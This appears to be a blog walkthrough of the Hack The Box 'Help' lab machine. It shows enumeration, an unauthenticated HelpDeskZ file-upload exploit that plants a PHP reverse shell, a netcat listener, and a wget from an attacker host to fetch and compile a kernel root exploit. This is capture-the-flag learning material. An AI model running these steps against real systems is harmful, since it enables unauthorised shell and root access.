HTB Help — Walkthrough

So let’s start enumeration with nmap scan

root@ArmourInfosec:/ nmap -sV
Nmap scan report for (
Host is up (0.22s latency).
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s visit on port number 80 and see what’s going on there

just Apache default index file nothing else

lets try gobuster with a small wordlist

root@ArmourInfosec:/ gobuster -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster v2.0.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain :
[+] Threads : 40
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
2019/05/01 08:45:18 Starting gobuster
/support (Status: 301)
/javascript (Status: 301)
2019/05/01 08:45:50 Finished

When we visit, there is the “HelpDeskZ :: Support Ticket System

Ok so search if there is any exploit for it

root@ArmourInfosec:/ searchsploit helpdeskz

Arbitary file upload looks interesting because it’s unauthenticated

Let’s try to exploit it

According to the exploit when we upload a ticket with php or some of the other extension files it shows “File is not allowed” but the file is uploaded and save to a special location under “” with a encrypted name and the link we can get by the exploit so lets try I’m going to upload php reverse shell as “1.php” (remember to change the IP and Port in shell file if you are also using reverse shell), visit

file all fields and then select the shell file and click upload it shows “File is not allowed”

then we run the exploit

root@ArmourInfosec:/ python 1.php
root@ArmourInfosec:/ nc -lvp 4444
$ cd /home/help$ cat user.txt

We got the user, for root first let’s have tty shell for that i follow the linux eop so a simple command

$ python -c ‘import pty;pty.spawn(“/bin/bash”)’

We got the tty shell

Now let’s gather some information about the machine like kernel version etc.

So for that

help@help:/$ uname -a
So it’s kernel version is 4.4.0–116, let’s find some exploits for this
root@ArmourInfosec:/ searchsploit linux 4.4.0–116
Here is a Local Privilege Escalation exploit

Let’s upload it on the victim machine I will do it with web server service

In Attacker machine

root@ArmourInfosec:/ python -m SimpleHTTPServer 80

In Victim machine

help@help:/$ cd /tmphelp@help:/$ wget http://<Attacker_IP>/44298.c
help@help:/$ gcc 44298.chelp@help:/$ ./a.out
As soon as you run it you will get root user
help@help:/$ cd /roothelp@help:/$ cat root.txt

And you got the root!!!!!!!!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

What the helpdeskz exploit doing ?

the system is saving invalid file to the tickets directory with a special name as it is taking current time and converting it to string then adding it with filename and generating its md5hash and then saving file with this name so the script is just reversing it and giving us the exaxt link where the response is “200 FOUND”.




Security Researcher | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

In-place Operations in PyTorch

Creating High Performing Agile Teams

How to spot the warning signs for technical debt

Reduce Toil with Better Alerting Systems

When the bough breaks: The end of the SIEM era and rise of ELK

Let’s talk about TestBox in a nutshell

We’ve been building a RegTech for a year and this is what we’ve learned

#Defido Nice Project

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vaibhav Joshi

Vaibhav Joshi

Security Researcher | OSCP

More from Medium — New IDO site on the Cronos network (part 4 — marketing)


High Frequency Estimator of Future Prices — Micro-price paper & code walkthrough

Understanding Trading Platforms